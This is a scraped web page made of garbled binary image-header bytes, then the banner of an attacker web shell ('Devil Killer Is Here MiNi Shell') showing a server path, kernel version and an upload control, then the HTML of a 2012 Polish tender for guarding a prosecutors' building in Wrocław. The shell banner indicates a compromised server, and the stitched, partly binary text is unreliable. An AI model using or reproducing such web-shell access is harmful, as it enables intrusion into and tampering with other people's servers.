JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121130/481576-N-2012.html

<p class="kh_header"><b>Wrocław: Całodobowa  ochrona fizyczna osób i mienia w budynku Prokuratur Rejonowych dla Wrocławia Fabryczna, Stare Miasto, Psie Pole i Śródmieście  przy ul. Sądowej 2 
w okresie od 31.12.2012r.godz. 8:00 do 31.12.2013 r. godz.8:00</b><br>
<b>Numer ogłoszenia: 481576 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa we Wrocławiu , ul. Podwale 30, 50-950 Wrocław, woj. dolnośląskie, tel. 071 3718114 wew. 241, faks 071 3718114 w. 244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prokuratura.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Prokuratura.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa  ochrona fizyczna osób i mienia w budynku Prokuratur Rejonowych dla Wrocławia Fabryczna, Stare Miasto, Psie Pole i Śródmieście  przy ul. Sądowej 2 
w okresie od 31.12.2012r.godz. 8:00 do 31.12.2013 r. godz.8:00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem niniejszego zamówienia jest 
całodobowa ochrona fizyczną osób i mienia w budynku Prokuratur Rejonowych dla Wrocławia Fabryczna, Stare Miasto, Psie Pole i Śródmieście przy ul. Sądowej 2. Przedmiotowa usługa obejmuje również  ochronę wejścia od ul. Podwale 28 
w dni robocze (od poniedziałku do piątku)  w godz. od 7:00 do 17:00 oraz całodobową ochronę posesji wokół obiektu Prokuratury .

1.	Usługa ochrony obejmuje:
a)	działania mające na celu zapewnienie ochrony życia, zdrowia i nietykalności     osobistej pracowników i petentów oraz bezpieczeństwa budynku,  działania zapobiegające  przestępstwom i wykroczeniom przeciwko mieniu, a także przeciwdziałanie powstaniu szkody wynikającej z tych zdarzeń oraz zdarzeń losowych oraz niedopuszczanie do wstępu osób nieuprawnionych na teren chroniony.
b)	Obsługę centrali telefonicznej od godz. 7:00 do 17:00 w dni robocze od poniedziałku do piątku. 
c)	Pełnienie funkcji informacyjnej dla petentów Prokuratur Rejonowych dla Wrocławia Stare Miasto, Śródmieście, Fabryczna i Psie Pole przy ul. Sądowej 2/Podwale 28,

2.	Sposób realizacji usług polega na ochronie obiektu (bez broni) w dwóch oddzielnych punktach ochrony znajdujących się na terenie jednego budynku:
1.	W punkcie od ul. Sadowej 2 - w systemie jednoosobowym, całodobowo, ze szczególnym zwróceniem uwagi na porę nocną we wszystkie dni miesiąca - pracownik umundurowany po kursie podstawowym (szkolenie stanowiskowe - licencja nie jest wymagana) oraz obsłudze centrali telefonicznej. 
2.	W punkcie od ul. Podwale 28 - w systemie jednoosobowym, ochrona wejścia i obsługa centrali telefonicznej, w dni robocze od poniedziałku do piątku w godz. 7:00 - 17:00 - pracownik umundurowany po kursie podstawowym ( szkolenie stanowiskowe - licencja nie jest wymagana

Wykonawca ustali z Zamawiającym dopuszczalną rotację pracowników ochrony.


3.	Szczegółowy zakres usługi ochrony fizycznej osób i mienia obejmuje:
1.)	Zapewnienie kontroli nad infrastrukturą chronionego obiektu oraz zapobieganie próbom kradzieży, dewastacji i uszkodzenia mienia wewnątrz chronionego obiektu,
2.)	ochronę siedziby przed napadem, włamaniem, kradzieżą, aktami wandalizmu i dewastacji mienia na zewnątrz obiektu (np. niszczenie elewacji obiektu, niszczenie zainstalowanych urządzeń),
3.)	Interwencję w przypadku przebywania osób nieuprawnionych na terenie posesji,
4.)	Zapobieganie zakłóceniom porządku publicznego na terenie obiektu i posesji,
5.)	Niezwłoczne powiadamianie organów ścigania o czynach przestępczych zaistniałych na terenie obiektu i posesji i zabezpieczenie miejsca ich popełnienia do czasu przybycia organów ścigania,
6.)	Reagowanie na wszelkie przypadki zakłócenia porządku na terenie całego obiektu,
7.)	Współdziałanie ze służbami ochrony ppoż. w likwidowaniu zagrożeń pożarowych,
8.)	Prowadzenie rejestru osób wchodzących i wychodzących z obiektu,
9.)	Realizowanie funkcji informacyjnej dla petentów Prokuratur Rejonowych  dla Wrocławia -  Fabryczna, Psie Pole, Stare Miasto i Śródmieście - pełniący służbę będą zobowiązani poznać w terminie 7 dni od daty rozpoczęcia świadczenia usługi lokalizację poszczególnych jednostek w budynku, numerację pomieszczeń rozmieszczenie ciągów komunikacyjnych ( klatki schodowe, winda) i we właściwy sposób kierować petentów zgłaszających się do Prokuratur. 
10.)	W przypadku jakichkolwiek zagrożeń niezwłoczne powiadamianie policji, straży pożarnej i innych służb oraz współdziałanie z ww. w celu zapewnienia prawidłowej ochrony,
11.)	Zgłaszanie Zamawiającemu usterek i naruszeń w zabezpieczeniach obiektu i pomieszczeniach.

4.	Pracownik ochrony zobowiązany jest:
1)	Punktualnie rozpoczynać i kończyć służbę oraz dokonywać wpisu o jej rozpoczęciu i końcu w książce dyżurów,
2)	Przychodzić na służbę w stanie zdrowia umożliwiającym jej pełnienie,
3)	Nie dopuścić do wejścia na teren chronionego obiektu osób nieuprawnionych oraz osób będących pod wpływem alkoholu lub środków odurzających,
4)	Nie dopuszczać do wejścia na teren chronionego obiektu osób posiadających broń, amunicję, a także wnoszących materiały wybuchowe lub inne środki niebezpieczne (za wyjątkiem osób do tego uprawnionych - policji),
5)	Informować interesantów odnośnie osoby i miejsca załatwienia spraw,
6)	Podejmować niezbędne interwencje w przypadku stwierdzenia naruszenia zasad bezpieczeństwa ochranianych osób i mienia,
7)	Kontrolować ruch osobowo-materiałowy wewnątrz i na zewnątrz obiektu oraz podejmować działania w przypadku jego naruszenia,
8)	Sprawdzać stan bezpieczeństwa obiektu i pomieszczeń pod kątem nienaruszalności zamknięć,
9)	Czytelnie prowadzić dokumentację służby ochrony:
- książkę dyżuru,
- książkę ewidencji wejść-wyjść interesantów,
ww dokumentację dostarczy Wykonawca.
10)	Przestrzegać dyscypliny pracy oraz właściwej prezencji,
11)	Egzekwować od osób przebywających na terenie obiektu przestrzeganie przepisów porządkowych, ppoż., itp.,
12)	Dokonywać obchodów wewnętrznych i zewnętrznych ochranianego obiektu Prokuratury w godzinach pracy oraz po godzinach pracy urzędu, ze szczególnym zwróceniem uwagi na bezpieczeństwo ogólne i przeciwpożarowe,
13)	Sprawdzać, czy po zakończeniu pracy pracowników Prokuratur Rejonowych:
- pozamykane są okna,
- pogaszone są światła,
- na terenie jednostki nie przebywają osoby, które nie mają do tego  uprawnień,
14)	Zamykać i otwierać drzwi wejściowe,
15)	Otwierać obiekt i wpuszczać na jego teren pracowników Prokuratury w godzinach porannych oraz zamykać obiekt niezwłocznie po zakończeniu urzędowania. W przypadku wykonywania przez pracowników Prokuratury pracy po godzinach urzędowania, osoba ochraniająca obiekt zobowiązana jest nadzorować ich przebywanie w obiekcie,
16)	Reagować na zgłoszenia systemów elektronicznych (w szczególności systemu ppoż.), a także na zauważone zdarzenia mogące mieć wpływ na wystąpienie strat w mieniu (zalanie pomieszczeń, uszkodzenie oświetlenia, uszkodzenia zamków, drzwi, przecieki),
17)	Przeciwdziałać zaistnieniu potencjalnych zagrożeń zewnętrznych i wewnętrznych,
18)	Przestrzegać ustaleń zawartych w zarządzeniach i innych przepisach dotyczących ochranianego obiektu,
19)	Zachowywać się w sposób taktowny w stosunku do osób współpracujących, jak również do petentów,
20)	Składać bieżące meldunki Zamawiającemu o niedociągnięciach i brakach w zabezpieczeniu mienia przez Zamawiającego, a także o stwierdzonych przypadkach niewłaściwego zabezpieczenia mienia przez pracowników Zamawiającego,
21)	Składać Zamawiającemu raporty dotyczące zdarzeń i incydentów zaistniałych podczas dyżuru oraz informować o przypadkach wystąpienia kradzieży czy zniszczenia mienia,
22)	Przestrzegać przepisów bhp, ppoż. i instrukcji obsługi urządzeń zabezpieczających i alarmowych,
23)	Postępować z należytą starannością podczas wykonywania ochrony w ramach uprawnień posiadanych przez pracowników ochrony, które na podstawie przepisów prawa w szczególności pozwalają na odpieranie bezpośredniego, bezprawnego i rzeczywistego zamachu na jakiekolwiek dobro społeczne lub osoby i mienie pozostające pod ochroną, przeciwdziałanie kradzieżom, napadom i innym zakłóceniom porządku i spokoju oraz natychmiastowego  podjęcia działań mających na celu minimalizacji szkód powstałych w wyniku zakłócenia porządku i spokoju, kradzieży i włamania, pożaru, awarii instalacji i urządzeń technicznych, klęsk żywiołowych i innych zdarzeń losowych, sprawdzanie stanu zamknięć, zabezpieczeń itp.,
24)	Sumienne i dokładne wykonywać zadania służbowe w celu zapewnienia bezpieczeństwa i ochrony mienia ochranianego obiektu.

3.	Pracownikowi ochrony kategorycznie zabrania się:
1)	Spożywania i posiadania alkoholu w czasie wykonywania obowiązków, palenia   tytoniu poza miejscami do tego wyznaczonymi,
2)	Przystępowania do pracy pod wpływem alkoholu,
3)	Informowania osób trzecich o przebiegu służby i o zaistniałych zdarzeniach,
4)	Podejmowania podczas służby towarzyskich rozmów i dyskusji, prowadzenia     rozmów telefonicznych w sprawach prywatnych,
5)	wprowadzania na teren Prokuratury osób trzecich, nie posiadających zgody na wejście.

4.	Do obowiązków Wykonawcy należy:
1)	Zapewnienie kadr wykonawczych, niezbędnych do prawidłowego wykonywania usługi posiadających  niezbędne przygotowanie zawodowe.
Wykonawca będzie zobowiązany uzyskać od Zamawiającego zgodę na wejście do obiektu dla każdego pracownika. W tym celu przed podpisaniem umowy przedstawi zaświadczenia o niekaralności osób zatrudnionych przy realizacji usługi,  wystawione nie wcześniej niż 3 miesiące przed dniem rozpoczęcia świadczenia usługi. Obowiązek ten dotyczy również osób, które wcześniej były zatrudnione w obiekcie, którego dotyczy postępowanie lub innym obiekcie należącym do Prokuratury Okręgowej we Wrocławiu lub którejkolwiek Prokuratury Rejonowej okręgu wrocławskiego. Ta sama procedura obowiązuje w przypadku zatrudnienia nowych pracowników przez cały czas obowiązywania umowy.  Zamawiający zwraca uwagę na konieczność ograniczenia rotacji pracowników zatrudnionych przy realizacji usługi. 

2)	Sprawowanie nadzoru i kontroli nad realizacją służby ochrony,
3)	Dbałość o dyscyplinę pracy i schludny wygląd podległych pracowników ochrony,
4)	Zapewnienie minimalnego wyposażenia stanowiska pracy, które obejmuje:
-	telefon komórkowy zapewniający łączność ze swoimi przełożonymi, policją, innymi służbami ratowniczymi  lub osobą upoważnioną przez Zamawiającego,
-	latarkę,
-	materiały biurowe niezbędne do pełnienia służby (książka dyżurów oraz artykuły piśmiennicze),
5)	Wyposażenie pracownika ochrony, na własny koszt w jednolity oznakowany ubiór służbowy z napisem OCHRONA, w okresie jesienno-zimowym w ciepłą odzież,
6)	Wyposażenie pracownika ochrony w identyfikator osobisty z nazwą firmy noszony w widocznym miejscu,
7)	Świadczenie usług objętych zakresem umowy z należytą starannością,
8)	Przeprowadzanie wewnętrznych kontroli swoich służb minimum dwa razy w miesiącu z wpisem do książki dyżurów,
9)	Zachowanie w tajemnicy wszelkich informacji dotyczących ochranianego obiektu oraz innych informacji związanych z działalnością  Zamawiającego,
10)	Przekazywanie Zamawiającemu, przed podpisaniem umowy, listy pracowników, którzy będą ochraniać obiekt, z zaznaczeniem, w jakim trybie zmianowym Wykonawca będzie realizował przedmiot zamówienia. W przypadku zmian kadrowych dotyczących osób ochraniających obiekt Zamawiającego w trakcie trwania umowy Wykonawca powiadomi Zamawiającego o tym fakcie pisemnie z tygodniowym wyprzedzeniem, a w przypadkach losowych - telefonicznie (niezwłocznie potwierdzając pisemnie),
11)	Minimalizowanie zmian personalnych pracowników ochrony, a w przypadku konieczności zmiany zawiadomienie o jej fakcie na piśmie Zamawiającego. Każdorazowo dla nowego pracownika Wykonawca przedstawi zaświadczenie z Krajowego Rejestru Karnego, wystawione nie wcześniej niż 3 miesiące przed dniem rozpoczęcia służby (zgodnie z  p. I  ppkt. 4  lit. a w rozdziale II SIWZ ),
12)	 Zapoznanie pracowników ochrony z przepisami BHP i ppoż.,
13)	Przeszkolenie pracowników ochrony w zakresie obowiązków, zapewnienie znajomości przez nich topografii obiektu, w tym rozkładu pomieszczeń, przebiegu dróg ewakuacyjnych itp.,
14)	Zaznajomienie pracowników ochrony z rozmieszczeniem i obsługą w podstawowym zakresie wyłączników głównych energii elektrycznej, zaworów wodnych, wyłączników systemów monitorujących antywłamaniowych i przeciwpożarowych,
15)	W trakcie trwania umowy, posiadanie ważnej polisy potwierdzającej ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 200 000,00 zł,
16)	 Informowanie Zamawiającego o wszelkich zmianach w treści koncesji zezwalającej na prowadzenie działalności w przedmiocie objętym zamówieniem oraz w treści polisy ubezpieczeniowej.

5.	Zamawiający umożliwi wykonanie usługi poprzez:
Zapoznanie wyznaczonego pracownika Wykonawcy w zakresie:
-znajomości wewnętrznych regulaminów,
-znajomości topografii obiektu, rozkładu pomieszczeń, przebiegu dróg ewakuacyjnych,
-rozmieszczenia i obsługi w podstawowym zakresie wyłączników głównych energii elektrycznej, głównych zaworów wodnych, zaworów CO, wyłączników urządzeń podtrzymujących,

6.	Wymagania stawiane pracownikom ochrony:
a) osoby w pełni sprawne fizycznie potrafiące zażegnać wszelkie próby wtargnięcia i zakłócenia spokoju i porządku w budynku Prokuratur Rejonowych
b) osoby posiadające przeszkolenie w zakresie ochrony osób i mienia, poświadczone świadectwem - kurs  podstawowy
c) osoby posiadające aktualne poświadczenie o niekaralności
d) osoby umundurowane, z widocznym  identyfikatorem, w ciągu dnia umundurowanie wyjściowe
e) każdy pracownik ochrony obowiązany jest posiadać środki łączności bezprzewodowej zapewniające bezpośrednie połączenie z firmą macierzystą i Zamawiającym
Zamawiający nie wymaga, aby zatrudnieni przez firmę ochroniarską pracownicy posiadali licencję pracownika ochrony. 
7.	Wizja lokalna obiektu
Zaleca się, aby Wykonawca dokonał wizji lokalnej obiektu w celu uzyskania wszelkich informacji, które mogą być przydatne do przygotowania oferty. Każdy Wykonawca ponosi odpowiedzialność oraz ryzyko za treść uzyskanych informacji. Wizja lokalna zostanie dokonana na własny koszt Wykonawcy. Zamawiający zapewni każdemu Wykonawcy możliwość wejścia na teren obiektu i swobodne zebranie wszelkich informacji, po wcześniejszym kontakcie telefonicznym z Inspektorem Prokuratury Okręgowej we Wrocławiu, Panią Beatą Kielczyk  Tel. (71) 371 81 14-18 wew. 210 w godzinach od 900 do 1400.

II.	Opis obiektu:
a)	Budynek pięciokondygnacyjny, o powierzchni całkowitej ok. 4 500 m2, oświetlenie zewnętrzne, monitoring zewnętrzny
b)	Posesja wokół obiektu nieogrodzona, oświetlona, obejmuje:
-	Chodnik ul. Podwale 28 na całej długości budynku ( ok. 90 mb)
-	Placyk przy ul. Sądowej 2 - 100m2 ( pomiędzy skwerem zieleni a wejściem do budynku)
-	Parking wewnętrzny ul. Sądowa 2 - 330m2

III.	Termin realizacji zamówienia : od 31.12.2012 godz. 8:00 do 31.12.2013 godz.8:00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 2 000,- złotych (słownie: dwa tysiące  złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  posiadają koncesję Ministra Spraw Wewnętrznych i Administracji na wykonywanie usług ochrony osób i mienia oraz złożą oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 uPzp wg załącznika nr 2 do SIWZ.
Sprawdzenie ww warunku odbywać się będzie na podstawie przedłożonego przez Wykonawcę Oświadczenia i dokumentów  wg zasady spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy -   w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych - również wykonują:
a)	co najmniej 3 usługi  o charakterze i złożoności porównywalnej          
z przedmiotem zamówienia,  
b)	wykonali-wykonują ww usługi należycie, oraz złożą oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 uPzp wg załącznika nr 2 do SIWZ.
Sprawdzenie ww warunku odbywać się będzie na podstawie przedłożonego przez Wykonawcę Oświadczenia i dokumentów  wg zasady spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 uPzp wg załącznika nr 2 do SIWZ.
Sprawdzenie ww warunku odbywać się będzie na podstawie przedłożonego przez Wykonawcę Oświadczenia  wg zasady spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 uPzp wg załącznika nr 2 do SIWZ.
Sprawdzenie ww warunku odbywać się będzie na podstawie przedłożonego przez Wykonawcę Oświadczenia  wg zasady spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzysą ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę  min. 200.000,- zł.
Sprawdzenie ww warunku odbywać się będzie na podstawie przedłożonego przez Wykonawcę Oświadczenia  wg zasady spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

